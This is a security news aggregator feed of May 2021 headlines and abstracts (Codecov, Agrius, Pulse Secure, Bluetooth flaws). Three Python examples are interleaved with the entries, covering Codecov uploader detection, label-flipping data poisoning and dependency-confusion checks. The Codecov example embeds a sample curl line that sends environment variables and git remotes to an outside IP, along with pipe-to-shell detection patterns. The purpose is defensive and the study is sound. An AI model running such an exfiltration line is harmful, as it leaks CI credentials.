May 25, 2021 – Encryption

Post-quantum cryptographic standards to be finalized later this year Full Text

Abstract The new cryptographic standards will likely underpin IT design and guide industrial purchasing decisions for decades to come.

SCMagazine

May 25, 2021 – General

Hillicon Valley: DC attorney general files antitrust lawsuit against Amazon | DHS to require pipeline companies to report cyberattacks | Activists, parents urge Facebook to drop Instagram for kids plan Full Text

Abstract Amazon found itself in hot water on Tuesday, with the Washington, D.C. attorney general filing an antitrust lawsuit against it, and over 600 Amazon tech workers separately calling on the company to address pollution levels concentrated in communities of color. Meanwhile, two branches of the Department of Homeland Security will soon issue guidance requiring pipeline companies to report cybersecurity incidents to federal authorities following the Colonial Pipeline hack, and thousands of activists and parents are calling on Facebook to drop its plans for an Instagram for kids.

The Hill

May 25, 2021 – Privacy

Lawmakers request investigation into Postal Service’s covert operations program Full Text

Abstract The bipartisan leaders of the House Oversight and Reform Committee on Tuesday requested an investigation into a branch of the U.S. Postal Service in the wake of reports that it carried out online surveillance of Americans’ social media posts. 

The Hill

May 25, 2021 – Vulnerabilities

Ivanti fixes high severity flaw in Pulse Connect Secure VPN Full Text

Abstract A flaw in Pulse Connect Secure VPN could allow an authenticated remote attacker to execute arbitrary code with elevated privileges. Ivanti addressed a high-severity buffer overflow vulnerability in Pulse Connect Secure VPN appliances that could allow a remote authenticated...

Security Affairs

May 25, 2021 – General

Average losses from compromised cloud accounts are more than $500,000 a year Full Text

Abstract The report also noted that 68% of respondents believe cloud account takeovers present a significant security risk to their organizations – and more than 50% indicated that the frequency and severity of cloud account compromises increased over the past year.

SCMagazine

May 25, 2021 – Attack

Threat Actor ‘Agrius’ Emerges to Launch Wiper Attacks Against Israeli Targets Full Text

Abstract The group is using ransomware intended to make its espionage and destruction efforts appear financially motivated.

Threatpost

May 25, 2021 – Vulnerabilities

Apple Patches Zero-Day Flaw in MacOS that Allows for Sneaky Screenshots Full Text

Abstract Security researchers at Jamf discovered the XCSSET malware exploiting the vulnerability, patched in Big Sur 11.4, to take photos of people’s computer screens without their knowing.

Threatpost

May 25, 2021 – Government

US to Regulate Pipeline Cybersecurity Full Text

Abstract Department of Homeland Security to issue first cybersecurity regulations for pipelines after Colonial cyber-attack

Infosecurity Magazine

May 25, 2021 – Breach

Domino’s India discloses data breach after hackers sell data online Full Text

Abstract Domino's India has disclosed a data breach after a threat actor hacked their systems and sold their stolen data on a hacking forum.

BleepingComputer

May 25, 2021 – Vulnerabilities

VMware warns of critical bug affecting all vCenter Server installs Full Text

Abstract VMware urges customers to patch a critical remote code execution (RCE) vulnerability in the Virtual SAN Health Check plug-in that impacts all vCenter Server deployments.

BleepingComputer

May 25, 2021 – Breach

Mobile Apps Exposing Personal Data of Millions of Users Full Text

Abstract Insecure data storage is the most common security flaw in Android apps. Recently, security analysts listed down 23 Android applications leaking personal data of over 100 million users due to misconfigurations in third-party cloud services.

Cyware Alerts - Hacker News

May 25, 2021 – General

E-tailers See Surge in Automated Fraud Full Text

Abstract Research into 2020 automated e-commerce fraud finds higher volume, frequency and sophistication

Infosecurity Magazine

May 25, 2021 – Botnet

Phorpiex Botnet is Still Active and Thriving Full Text

Abstract Decade-old botnets continue to adapt to the current threat landscape, as seen in the wide-ranging malicious activities of the resilient Phorpiex botnet. Even so, for many years the Phorpiex botnet has kept the same internal infrastructure, C2 mechanisms, and source code.

Cyware Alerts - Hacker News

May 25, 2021 – Ransomware

Iranian hacking group Agrius pretends to encrypt files for a ransom, destroys them instead Full Text

Abstract The group uses a combination of its own custom toolsets and readily available offensive security software to deploy either a destructive wiper or a custom wiper-turned-ransomware variant.

ZDNet

May 25, 2021 – Government

Coast Guard to Create Red Team Full Text

Abstract US Coast Guard to establish Cyber Operational Assessments Branch and form first red team

Infosecurity Magazine

May 25, 2021 – Malware

STRRAT - The RAT that Wants to be a Ransomware Full Text

Abstract Microsoft is warning against a malware campaign by STRRAT, a RAT first spotted in June 2020. It masquerades as ransomware and supports features such as logging keystrokes, collecting browser passwords, and running remote commands and PowerShell. Organizations should stay alert and offer tra ...

Cyware Alerts - Hacker News

May 25, 2021 – Attack

Codecov Supply Chain Attack Still Haunts Organizations Full Text

Abstract Does the Codecov supply chain attack have echoes of SolarWinds? More victims surface with time in yet another months-long ripple effect of a supply chain attack. Users of Codecov are advised to perform a thorough scan of their CI/CD pipelines and rotate their secret keys and passwords.

Cyware Alerts - Hacker News
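
The two concrete actions behind "scan your CI/CD pipelines": find every job that still executes the Bash Uploader straight off the network, and verify any fetched uploader against its published checksum before running it (the tampered copy was only caught because its SHA did not match). The script below is an added example, not Codecov's code and not from the article. It assumes CI files use the pipe-to-shell idiom `bash <(curl -s https://codecov.io/bash)` or `curl ... | bash`, that the reference checksum follows the `sha256sum` layout ("<hex>  <filename>" per line), and that the workflow, script bodies and checksum file are constructed; the tail of TAMPERED_SCRIPT mirrors the shape of the publicly reported malicious line, with a documentation IP standing in for the attacker's host.

```python
"""Two checks for the Codecov Bash Uploader incident. Added example; not Codecov's own code.

Assumptions beyond the article text:
  * CI steps are scanned for `bash <(curl -s https://codecov.io/bash)` and the
    `curl ... codecov.io/bash | bash` spelling, the idioms that fetched the tampered script;
  * the reference checksum file is in `sha256sum` layout, "<hex>  <filename>" per line;
  * SAMPLE_WORKFLOW, GOOD_SCRIPT, TAMPERED_SCRIPT and PUBLISHED_SUMS are constructed.
"""
import hashlib
import hmac
import re

UPLOADER_PATTERNS = (
    re.compile(r"bash\s*<\(\s*curl[^)]*codecov\.io/bash[^)]*\)"),
    re.compile(r"curl[^|\n]*codecov\.io/bash[^|\n]*\|\s*(?:ba)?sh\b"),
)


def find_unverified_uploads(ci_text: str):
    """(line number, line) for each CI step that runs the uploader straight off the network."""
    return [
        (no, line.strip())
        for no, line in enumerate(ci_text.splitlines(), start=1)
        if any(p.search(line) for p in UPLOADER_PATTERNS)
    ]


def verify_sha256sum(script: bytes, sha256sum_text: str, filename: str) -> bool:
    """Recompute SHA-256 over the fetched script and compare it with the published entry."""
    expected = None
    for line in sha256sum_text.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[1].lstrip("*") == filename:
            expected = parts[0].lower()
    if expected is None:
        raise ValueError(f"no checksum entry for {filename!r}")
    actual = hashlib.sha256(script).hexdigest()
    return hmac.compare_digest(actual, expected)


SAMPLE_WORKFLOW = """\
name: ci
jobs:
  test:
    steps:
      - run: pytest --cov
      - run: bash <(curl -s https://codecov.io/bash)
      - run: curl -s https://codecov.io/bash | bash -s -- -t ${CODECOV_TOKEN}
      - run: ./codecov -t ${CODECOV_TOKEN}   # checksum-verified binary fetched earlier
"""

GOOD_SCRIPT = b"#!/usr/bin/env bash\nset -e\necho 'uploading coverage'\n"
# Constructed: the shape of the reported malicious line (exfiltrating `env` and the git
# remotes), pointed at a documentation address instead of the attacker's host.
TAMPERED_SCRIPT = GOOD_SCRIPT + (
    b'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.9/upload || true\n'
)
# Published checksum file, constructed to match GOOD_SCRIPT only.
PUBLISHED_SUMS = hashlib.sha256(GOOD_SCRIPT).hexdigest() + "  codecov\n"

if __name__ == "__main__":
    for no, line in find_unverified_uploads(SAMPLE_WORKFLOW):
        print(f"line {no}: unverified uploader: {line}")
    print("good script matches    :", verify_sha256sum(GOOD_SCRIPT, PUBLISHED_SUMS, "codecov"))
    print("tampered script matches:", verify_sha256sum(TAMPERED_SCRIPT, PUBLISHED_SUMS, "codecov"))
```

The checksum comparison is the easy part; the rotation advice matters because the tampered uploader read the whole CI environment, so every token, key and password that was present in any job that ran it during the affected window has to be treated as disclosed, whatever the scan now says.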

May 25, 2021 – Breach

US Healthcare Non-Profit RMCHCS Reports Data Breach Affecting 200,000 Patients, Employees Full Text

Abstract The potentially exposed information includes names, dates of birth, postal addresses, telephone numbers, and email addresses, SSNs, driver’s license, passport, and tribal ID numbers.

The Daily Swig

May 25, 2021 – Government

DHS to require pipeline companies to report cyberattacks Full Text

Abstract The Department of Homeland Security (DHS) will issue a directive later this week requiring all pipeline companies to report cyber incidents to federal authorities in the wake of a devastating ransomware attack on Colonial Pipeline that forced a shutdown of operations.

The Hill

May 25, 2021 – Vulnerabilities

Trend Micro Bugs Threaten Home Network Security Full Text

Abstract The security vendor’s network management and threat protection station can open the door to code execution, DoS and potential PC takeovers.

Threatpost

May 25, 2021 – Business

Security startup Tessian, which uses AI to fight social engineering, trousers $65M Full Text

Abstract The Series C round was led by March Capital. Existing investors Accel, Balderton Capital, Latitude, and Sequoia Capital also participated, along with new investor Schroder Adveq.

TechCrunch

May 25, 2021 – General

Victims lose millions to healthcare related eCrime Full Text

Abstract Victim losses from healthcare-related eCrime in the U.S. rose by 2,473 percent during 2020 as the COVID-19 pandemic swept through the nation and world, CrowdStrike reveals.

Help Net Security

May 25, 2021 – Attack

TeamTNT Targets Kubernetes Clusters and Infiltrates Nearly 50,000 IPs in Worm-like Attack Full Text

Abstract Most of the compromised nodes were from China and the United States — identified in the ISP list, which had Chinese and US-based providers as the highest hits, including some CSPs.

Trend Micro

May 25, 2021 – General

The New Normal Full Text

Abstract As governments start loosening the restrictions due to COVID-19, we are starting to see a change in attack vectors. In fact, the new normal for cyber attacks is starting to look a lot like the old normal. FortiGuard Labs shares its insights into the changes it is seeing in attack vectors and provides insights into…

SCMagazine

May 25, 2021 – Denial Of Service

DDoS hacking attempts drop in Q1 2021: Report Full Text

Abstract In the first quarter of 2021, the number of DDoS attacks dropped by 29% compared to the same period in 2020, but increased by 47% compared to the fourth quarter in 2020, says a Kaspersky report.

The Times Of India

May 25, 2021 – Attack

Hacking Attack on Japanese Dating App Omiai Puts 1.71 Million Users at Risk Full Text

Abstract Japanese dating app operator Net Marketing Co. said Friday personal data of 1.71 million users, including names and face photos, was likely leaked due to unauthorized access to its server.

The Japan Times

May 25, 2021 – Ransomware

Iranian hacking group targets Israel with wiper disguised as ransomware Full Text

Abstract An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks while maintaining access to victims' networks for months in what looks like an extensive espionage campaign.

BleepingComputer

May 25, 2021 – Breach

Bose Admits Ransomware Hit: Employee Data Accessed Full Text

Abstract The consumer-electronics stalwart was able to recover without paying a ransom, it said.

Threatpost

May 25, 2021 – Vulnerabilities

Pulse Secure VPNs Get Quick Fix for Critical RCE Full Text

Abstract One of the workaround XML files automatically deactivates protection from an earlier workaround: a potential path to older vulnerabilities being opened again.

Threatpost

May 25, 2021 – Ransomware

Evolution of JSWorm ransomware Full Text

Abstract Several versions of JSWorm were released as part of each “rebranded” variant, each altering different aspects of the code, including file extensions, cryptographic schemes, and encryption keys.

Kaspersky Labs

May 25, 2021 – Government

Hack, Disinform, Deny: Russia’s Cybersecurity Strategy Full Text

Abstract In the past, Moscow has faced numerous allegations of cyberattacks that resulted in multiple sanctions and the expulsion of its diplomats. The term "hacker" has almost become synonymous with Russia.

Security Week

May 25, 2021 – General

Download Ultimate ‘Security for Management’ Presentation Template Full Text

Abstract There is a person in every organization who is the direct owner of breach protection. His or her task is to oversee and govern the process of designing, building, maintaining, and continuously enhancing the security level of the organization. Title-wise, this person is most often the CIO, CISO, or Director of IT. For convenience, we'll refer to this individual as the CISO. This person is the subject-matter expert in understanding the standard set of active cyber risks, benchmarking to what degree the organization's exposure influences potential impact. They then take appropriate steps to ensure the major risks are addressed. On top of being engaged 24/7 in the organization's actual breach protection activity, the CISO has another critical task: to articulate the risks, potential impacts and appropriate steps to take to the company's management – or in other words, they must effectively translate security issues for non-security-savvy executives in a clear and busi

The Hacker News

May 25, 2021 – General

Three-Quarters of CISOs Predict Another SolarWinds-Style Attack Full Text

Abstract Splunk warns that cloud complexity is a major threat

Infosecurity Magazine

May 25, 2021 – Privacy

The Cyberlaw Podcast: Is Apple Storing Its Dorian Gray Portrait Behind the Great Firewall? Full Text

Abstract Paul Rosenzweig kicks off the news roundup by laying out the New York Times’s brutal overview of the many compromises Tim Cook’s Apple has made with an increasingly oppressive Chinese government. There is no way to square Apple’s aggressive opposition to U.S. national security measures with its quiet surrender to much more demanding Chinese measures.

Lawfare

May 25, 2021 – Vulnerabilities

Trend Micro fixes 3 flaws in Home Network Security Devices Full Text

Abstract Trend Micro fixed some flaws in Trend Micro Home Network Security devices that could be exploited to elevate privileges or achieve arbitrary authentication. Trend Micro fixed three vulnerabilities in Home Network Security devices that could be exploited...

Security Affairs

May 25, 2021 – General

Low sophistication OT breaches on the rise, with hackers learning from easy wins Full Text

Abstract Hackers with minimal experience and technical expertise are increasingly targeting industrial networks, driving a new wave of low-sophistication OT breaches that researchers tell SC Media is a strong learning opportunity for criminals looking to monetize their work. The low-sophistication attacks, which are outlined by Mandiant in a new blog post released Tuesday, encompass…

SCMagazine

May 25, 2021 – Vulnerabilities

How data manipulation could be used to trick fraud detection algorithms on e-commerce sites Full Text

Abstract A data poisoning attack aims to modify a machine learning model’s training set by inserting incorrectly labeled data with the goal of tricking it into making incorrect predictions.

Help Net Security
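
The abstract states the attack in one sentence; the effect is easier to see on a model you can hold in your head. The script below is an added example, not from the article or the researchers it cites. Everything in it is constructed: a nearest-centroid classifier over two normalised features per transaction (amount, transactions per hour), a clean training set, and two attacker-supplied rows that look like fraud but carry a "legit" label. The attacker never touches the model; the mislabelled rows alone drag the "legit" centroid toward the fraud cluster, so a borderline fraudulent transaction is waved through. The last function is a cheap sanitisation step: a training row whose label is in the minority among its nearest neighbours is flagged, which catches the injected rows here but is not a general defence (poison that arrives in a tight cluster of its own would pass it).

```python
"""Label-flipping data poisoning against a toy fraud model, plus a cheap sanity check.

Added example; not from the article. All data is constructed. Features per transaction:
(amount, transactions_per_hour), both scaled to [0, 1].
"""
from math import dist  # Python 3.8+

# Four clean "legit" rows near the origin, six clean "fraud" rows near (0.9, 0.9).
CLEAN_TRAINING = [
    ((0.10, 0.10), "legit"), ((0.20, 0.15), "legit"),
    ((0.15, 0.20), "legit"), ((0.10, 0.25), "legit"),
    ((0.90, 0.80), "fraud"), ((0.85, 0.90), "fraud"),
    ((0.95, 0.85), "fraud"), ((0.80, 0.95), "fraud"),
    ((0.90, 0.90), "fraud"), ((0.85, 0.80), "fraud"),
]

# Attacker-supplied rows: fraud-like feature vectors carrying a "legit" label.
POISON = [((0.88, 0.84), "legit"), ((0.82, 0.90), "legit")]
POISONED_TRAINING = CLEAN_TRAINING + POISON


def train(rows):
    """Nearest-centroid model: the mean feature vector of each label."""
    sums, counts = {}, {}
    for x, label in rows:
        acc = sums.setdefault(label, [0.0] * len(x))
        for i, v in enumerate(x):
            acc[i] += v
        counts[label] = counts.get(label, 0) + 1
    return {label: tuple(v / counts[label] for v in acc) for label, acc in sums.items()}


def predict(model, x):
    """Label whose centroid is closest to x."""
    return min(model, key=lambda label: dist(model[label], x))


def flag_label_disagreements(rows, k=5):
    """Indices of rows whose label is in the minority among their k nearest neighbours
    in the same training set. Injected rows sit inside the other class's cluster, so
    they stand out; the clean rows in this set do not."""
    flagged = []
    for i, (x, label) in enumerate(rows):
        neighbours = sorted(
            (dist(x, other_x), other_label)
            for j, (other_x, other_label) in enumerate(rows) if j != i
        )[:k]
        agree = sum(1 for _, other_label in neighbours if other_label == label)
        if agree * 2 < len(neighbours):  # fewer than half of the neighbours agree
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    borderline = (0.60, 0.60)  # a transaction halfway between the two clean clusters
    print("clean model   :", predict(train(CLEAN_TRAINING), borderline))     # fraud
    print("poisoned model:", predict(train(POISONED_TRAINING), borderline))  # legit
    print("rows flagged  :", flag_label_disagreements(POISONED_TRAINING))    # [10, 11]
```

Two rows out of twelve were enough to flip the decision on the borderline transaction, which is why the practical question for a fraud team is not the model but who can write to the labelled training set (chargeback feeds, analyst review queues, merchant dispute imports) and whether those writes are reviewed before retraining.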

May 25, 2021 – General

Cyber-Insurance Premiums Surged by Up to 30% in 2020 Full Text

Abstract GAO report warns of lower coverage limits for some verticals

Infosecurity Magazine

May 25, 2021 – Vulnerabilities

Apple addresses three zero-day flaws actively exploited in the wild Full Text

Abstract Apple has addressed three zero-day vulnerabilities in macOS and tvOS actively exploited in the wild by threat actors. Apple has released security updates to address three zero-day vulnerabilities affecting macOS and tvOS which have been exploited...

Security Affairs

May 25, 2021 – Breach

13 Million Users’ Personal Details Leaked Online After DailyQuiz Data Breach Full Text

Abstract The personal details of 13 million DailyQuiz users have been leaked online earlier this year after a hacker breached the quiz builder’s database and stole its content, which he later put up for sale.

The Record

May 25, 2021 – Policy and Law

GDPR Anniversary: Security Leaders More Concerned About Litigation Than Fines Full Text

Abstract 90% of security leaders are concerned about data breach litigation because of GDPR

Infosecurity Magazine

May 25, 2021 – Attack

Audio equipment maker Bose Corporation discloses a ransomware attack Full Text

Abstract The audio equipment manufacturer Bose Corporation said it was the victim of a ransomware attack that took place earlier this year, on March 7. Bose Corporation has announced it was the victim of a ransomware attack that took place earlier this year,...

Security Affairs

May 25, 2021 – General

Open source ecosystem ripe for dependency confusion attacks, research finds Full Text

Abstract Of the 1,000 organizations whose GitHub accounts were analyzed by a researcher, more than one in five – 212 – contained at least one dependency confusion-related misconfiguration in their codebase.

The Daily Swig
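
What "a dependency confusion-related misconfiguration" looks like in practice for an npm project, as an added example that is not the researcher's tooling and not from the article. It assumes a hypothetical private scope `@acme`, a placeholder internal registry URL, and that a correct .npmrc binds the scope to that registry with `@acme:registry=https://npm.internal.example/`. A scoped dependency whose scope has no such binding, or an unscoped dependency that is really an internal package, resolves to the public registry, where anyone can publish a same-named package with a higher version. The package.json and .npmrc contents are constructed.

```python
"""Dependency-confusion misconfiguration check for an npm project. Added example; not the
researcher's tooling from the article. `@acme` and https://npm.internal.example/ are
hypothetical; SAMPLE_PACKAGE_JSON, WEAK_NPMRC and FIXED_NPMRC are constructed.
"""
import json
import re

SCOPE_REGISTRY_RE = re.compile(r"^(@[^:\s]+):registry\s*=\s*(\S+)")


def scope_registry_map(npmrc_text: str) -> dict:
    """`@scope:registry=URL` bindings from .npmrc (';' and '#' start comments)."""
    mapping = {}
    for raw in npmrc_text.splitlines():
        line = re.split(r"[;#]", raw, maxsplit=1)[0].strip()
        m = SCOPE_REGISTRY_RE.match(line)
        if m:
            mapping[m.group(1)] = m.group(2)
    return mapping


def find_confusable(package_json_text: str, npmrc_text: str,
                    internal_scopes, internal_unscoped=()):
    """(package, reason) for every dependency the public registry could satisfy instead
    of the private one. `internal_scopes` and `internal_unscoped` come from your private
    registry's inventory; the check cannot guess which names are meant to be internal."""
    pkg = json.loads(package_json_text)
    bound = scope_registry_map(npmrc_text)
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(pkg.get(section, {}))
    findings = []
    for name in deps:
        scope = name.split("/", 1)[0] if name.startswith("@") else None
        if scope in internal_scopes and scope not in bound:
            findings.append((name, f"scope {scope} is not bound to a registry in .npmrc"))
        elif scope is None and name in internal_unscoped:
            findings.append((name, "internal package is unscoped; a public package of the "
                                   "same name with a higher version would win"))
    return findings


SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "acme-web",
    "dependencies": {
        "express": "^4.17.1",
        "@acme/auth-lib": "^2.1.0",
        "acme-billing-client": "^1.4.0",
    },
    "devDependencies": {"@acme/eslint-config": "^1.0.0"},
})
WEAK_NPMRC = "registry=https://registry.npmjs.org/\n"
FIXED_NPMRC = (
    "registry=https://registry.npmjs.org/\n"
    "@acme:registry=https://npm.internal.example/  ; private scope never leaves the building\n"
)

if __name__ == "__main__":
    for label, npmrc in (("weak .npmrc", WEAK_NPMRC), ("fixed .npmrc", FIXED_NPMRC)):
        print(label)
        for name, reason in find_confusable(SAMPLE_PACKAGE_JSON, npmrc,
                                            internal_scopes={"@acme"},
                                            internal_unscoped={"acme-billing-client"}):
            print(f"  {name}: {reason}")
```

With the fixed .npmrc the scoped packages drop out of the findings but `acme-billing-client` stays, which is the point: a registry binding protects a scope, not a bare name, so unscoped internal packages have to be renamed under the scope (or the public name claimed) before the misconfiguration is actually closed.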

May 25, 2021 – Vulnerabilities

Mozilla Thunderbird was saving OpenPGP keys in plaintext after encryption snafu Full Text

Abstract The vulnerability, tracked as CVE-2021-29956 and assessed as “low” impact by Mozilla, existed in the free open-source Thunderbird email client between version 78.8.1 and version 78.10.1.

The Register

May 25, 2021 – Vulnerabilities

Trend Micro Patches Vulnerabilities in Home Network Security Devices Full Text

Abstract Vulnerabilities identified by security researchers with Cisco’s Talos unit in Trend Micro Home Network Security devices could be exploited to elevate privileges or achieve arbitrary authentication.

Security Week

May 25, 2021 – Attack

Ransomware Hit: Tulsa Promises Recovery, Not Ransom Paying Full Text

Abstract Restoration work is continuing. "All of our computer systems - with a few exceptions - are down right now," Michael Derringer, the city's CIO, said at a press conference on Thursday.

Info Risk Today

May 25, 2021 – General

Only Two-Fifths of UK Firms Report Data Breaches On Time Full Text

Abstract On third GDPR anniversary, widespread confusion still reigns

Infosecurity Magazine

May 25, 2021 – Criminals

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract It appears that stolen API keys for cryptocurrency trading apps are being used by cybercriminals to easily empty their victims’ accounts on all major cryptocurrency exchanges.

Cyber News

May 25, 2021 – Denial Of Service

DeepSloth: Researchers find denial-of-service equivalent against machine learning systems Full Text

Abstract Presented at the International Conference on Learning Representations (ICLR), the technique neutralizes optimization techniques that speed up the operation of deep neural networks.

The Daily Swig

May 25, 2021 – Government

How Biden’s American Jobs Plan Seeks To Increase Cybersecurity Full Text

Abstract The White House, highlighting cybersecurity as "one of the preeminent challenges of our time," underscored how President Joe Biden’s American Jobs Plan would increase the country’s cyber defenses.

Forbes

May 25, 2021 – Vulnerabilities

New High-Severity Vulnerability Reported in Pulse Connect Secure VPN Full Text

Abstract Ivanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges. "Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user," the company said in an alert published on May 14. "As of version 9.1R3, this permission is not enabled by default." The flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack. "When specifying a long server name for some SMB operations, the 

The Hacker News

May 25, 2021 – General

US banks are giving facial recognition a go; EU tightens regulations, FTC updates AI guidelines Full Text

Abstract US banks are giving the green light to the adoption of facial recognition technology, while authorities provide regulations and updated guidelines. Many of the biggest US banks are trying their luck with facial recognition technology. The FTC issues...

Security Affairs

May 25, 2021 – General

How Hacking Became a Professional Service in Russia Full Text

Abstract The outfit behind the Colonial Pipeline ransomware attack had a blog, a user-friendly interface, and a sliding fee scale for helping hackers cash in on stolen information.

New Yorker

May 24, 2021 – Vulnerabilities

New Bluetooth Flaws Let Attackers Impersonate Legitimate Devices Full Text

Abstract Adversaries could exploit newly discovered security weaknesses in Bluetooth Core and Mesh Profile Specifications to masquerade as legitimate devices and carry out man-in-the-middle (MitM) attacks. "Devices supporting the Bluetooth Core and Mesh Specifications are vulnerable to impersonation attacks and AuthValue disclosure that could allow an attacker to impersonate a legitimate device during pairing," the Carnegie Mellon CERT Coordination Center said in an advisory published Monday. The two Bluetooth specifications define the standard that allows for many-to-many communication over Bluetooth to facilitate data transfer between devices in an ad-hoc network. The Bluetooth Impersonation AttackS, aka BIAS, enable a malicious actor to establish a secure connection with a victim, without having to know and authenticate the long-term key shared between the victims, thus effectively bypassing Bluetooth's authentication mechanism. "The BIAS attacks are the first

The Hacker News

May 24, 2021 – Vulnerabilities

Apple Issues Patches to Combat Ongoing 0-Day Attacks on macOS, tvOS Full Text

Abstract Apple on Monday rolled out security updates for iOS, macOS, tvOS, watchOS, and the Safari web browser to fix multiple vulnerabilities, including an actively exploited zero-day flaw in macOS Big Sur, and expand patches for two previously disclosed zero-day flaws. Tracked as CVE-2021-30713, the zero-day concerns a permissions issue in Apple's Transparency, Consent, and Control (TCC) framework in macOS that maintains a database of each user's consents. The iPhone maker acknowledged that the issue may have been exploited in the wild but stopped short of sharing specifics. The company noted that it rectified the problem with improved validation. However, in a separate report, mobile device management company Jamf said the bypass flaw was being actively exploited by XCSSET, a malware that's been out in the wild since August 2020 and known to propagate via modified Xcode IDE projects hosted on GitHub repositories and plant malicious packages into legitimate apps ins

The Hacker News

May 24, 2021 – Breach

Audio maker Bose discloses data breach after ransomware attack Full Text

Abstract Bose Corporation (Bose) has disclosed a data breach following a ransomware attack that hit the company's systems in early March.

BleepingComputer

May 24, 2021 – Policy and Law

American Express Fined for Sending Millions of Spam Messages Full Text

Abstract British regulators ruled that Amex sent 4 million nuisance emails to opted-out customers.

Threatpost

May 24, 2021 – Policy and Law

‘Dearthy Star’ pleads guilty to selling info of 65K health care employees Full Text

Abstract Justin Sean Johnson, a 30-year-old from Detroit, Michigan, has pleaded guilty to stealing the personally identifiable information (PII) of 65,000 employees of health care provider and insurer University of Pittsburgh Medical Center (UPMC) and selling it on the dark web.

BleepingComputer

May 24, 2021 – Malware

MountLocker Using Windows API to Spread as Worm Full Text

Abstract Experts identified a cybercriminal group called XingLocker that uses a customized MountLocker ransomware version. The latter was spotted using enterprise Windows Active Directory APIs to worm through networks.

Cyware Alerts - Hacker News

May 24, 2021 – General

Hillicon Valley: Huawei to move toward software development in wake of US restrictions | DeSantis signs bill to fine tech companies for banning politicians | Twitter to rollout ticketed Spaces to limited group of users Full Text

Abstract Huawei is moving towards a software development-driven future after years of nations including the U.S. cracking down on its 5G hardware due to security concerns. Meanwhile, Florida Gov. Ron DeSantis (R) signed a bill that will fine social media platforms for banning politicians, and Twitter will roll out ticketed options for its audio room feature.

The Hill

May 24, 2021 – Attack

Researchers Link CryptoCore Attacks On Cryptocurrency Exchanges to North Korea Full Text

Abstract State-sponsored hackers affiliated with North Korea have been behind a slew of attacks on cryptocurrency exchanges over the past three years, new evidence has revealed. Attributing the attack with "medium-high" likelihood to the Lazarus Group (aka APT38 or Hidden Cobra), researchers from Israeli cybersecurity firm ClearSky said the campaign, dubbed "CryptoCore," targeted crypto exchanges in Israel, Japan, Europe, and the U.S., resulting in the theft of millions of dollars worth of virtual currencies. The findings are a consequence of piecing together artifacts from a series of isolated but similar reports detailed by F-Secure, Japanese CERT JPCERT/CC, and NTT Security over the past few months. Since emerging on the scene in 2009, Hidden Cobra actors have used their offensive cyber capabilities to carry out espionage and cryptocurrency heists against businesses and critical infrastructure. The adversary's targeting aligns with North Korean

The Hacker News

May 24, 2021 – Insider Threat

FBI Employee Indicted Over Illegal Document Removal Full Text

Abstract Intelligence analyst allegedly took secret national security documents home for more than a decade

Infosecurity Magazine

May 24, 2021 – Vulnerabilities

French intel found flaws in Bluetooth Core and Mesh specs Full Text

Abstract Attackers could exploit a set of Bluetooth vulnerabilities, affecting the Core and Mesh Profile specifications, to conduct man-in-the-middle (MitM) attacks. Researchers at the French intelligence agency ANSSI discovered multiple flaws in the Bluetooth Core and Mesh...

Security Affairs

May 24, 2021 – General

As market for cyber insurance booms, watchdog calls for better data Full Text

Abstract The number of companies opting for cyber insurance has doubled in recent years, but costs may continue to rise as insurer payouts get bigger.

SCMagazine

May 24, 2021 – Vulnerabilities

Apple fixes three zero-days, one abused by XCSSET macOS malware Full Text

Abstract Apple has released security updates to patch three macOS and tvOS zero-day vulnerabilities attackers exploited in the wild, with the former being abused by the XCSSET malware to bypass macOS privacy protections.

BleepingComputer

May 24, 2021 – Ransomware

Double Extortion Becomes Old, Triple Extortion is the New Threat Full Text

Abstract This technique involves third parties linked to the victims, including service providers, company clients, and external colleagues, as they are massively impacted by data breaches resulting from ransomware attacks.

Cyware Alerts - Hacker News

May 24, 2021 – Business

Huawei to move toward software development in wake of US restrictions Full Text

Abstract Chinese telecommunications giant Huawei’s leadership is moving the company toward software development in the face of crippling pushback by many Western nations against use of the company’s hardware.

The Hill

May 24, 2021 – Education

Cybersecurity Lecturer Wins Lloyd’s Science of Risk Prize Full Text

Abstract University of Plymouth lecturer scoops prize for work on maritime cybersecurity research

Infosecurity Magazine

May 24, 2021 – Criminals

Zeppelin ransomware gang is back after a temporary pause Full Text

Abstract Operators behind the Zeppelin ransomware-as-a-service (RaaS) have resumed their operations after a temporary interruption. Researchers from BleepingComputer reported that operators behind the Zeppelin ransomware-as-a-service (RaaS), aka Buran, have...

Security Affairs

May 24, 2021 – Attack

FBI identifies 16 Conti ransomware attacks on US health care and first responder networks Full Text

Abstract According to the FBI, these health care and first responder networks are among the more than 400 organizations worldwide victimized by Conti – and over 290 are located in the U.S.

SCMagazine

May 24, 2021 – Vulnerabilities

Bluetooth flaws allow attackers to impersonate legitimate devices Full Text

Abstract Attackers could abuse vulnerabilities discovered in the Bluetooth Core and Mesh Profile specifications to impersonate legitimate devices during the pairing process and launch man-in-the-middle (MitM) attacks.

BleepingComputer

May 24, 2021 – Attack

Application Attacks Witnessed a Surge with Remote Working Full Text

Abstract According to the NTT 2021 Global Threat Intelligence Report, web application and application-specific attacks accounted for 67% of attacks in 2020. The data was collected from January 1, 2020, to December 30, 2020.

Cyware Alerts - Hacker News

May 24, 2021 – Business

EY and CrowdStrike partner to deliver cloud-based security services Full Text

Abstract The alliance combines CrowdStrike’s Falcon security platform and incident response – including digital forensics and investigations – with EY’s consulting and risk management services.

SCMagazine

May 24, 2021 – Covid-19

India: Cybercrimes spiral during second surge of Covid, 197 cases this month Full Text

Abstract There has been an exponential rise in the number of cyber crimes during the ongoing corona pandemic. Along with fraud, there are extortion cases that have also increased.

The Times Of India

May 24, 2021 – Breach

Logistics giant exposes customer data for over five months Full Text

